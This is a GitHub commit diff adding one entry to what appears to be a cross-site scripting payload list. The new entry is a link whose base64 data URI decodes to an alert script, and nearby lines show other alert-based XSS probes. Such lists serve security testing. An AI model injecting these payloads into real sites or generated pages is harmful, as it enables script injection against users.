XSS using base64 encoded href data in a link

This commit is contained in:
Alexandre ZANNI 2019-01-10 18:24:43 +01:00 committed by GitHub
parent ea0bddc18a
commit c7a292c19d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -162,6 +162,12 @@ URL/<script>alert('XSS');//
URL/<input autofocus onfocus=alert(1)> URL/<input autofocus onfocus=alert(1)>
``` ```
XSS using base64 encoded href data in a link
```
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
```
## XSS in wrappers javascript and data URI ## XSS in wrappers javascript and data URI
XSS with javascript: XSS with javascript: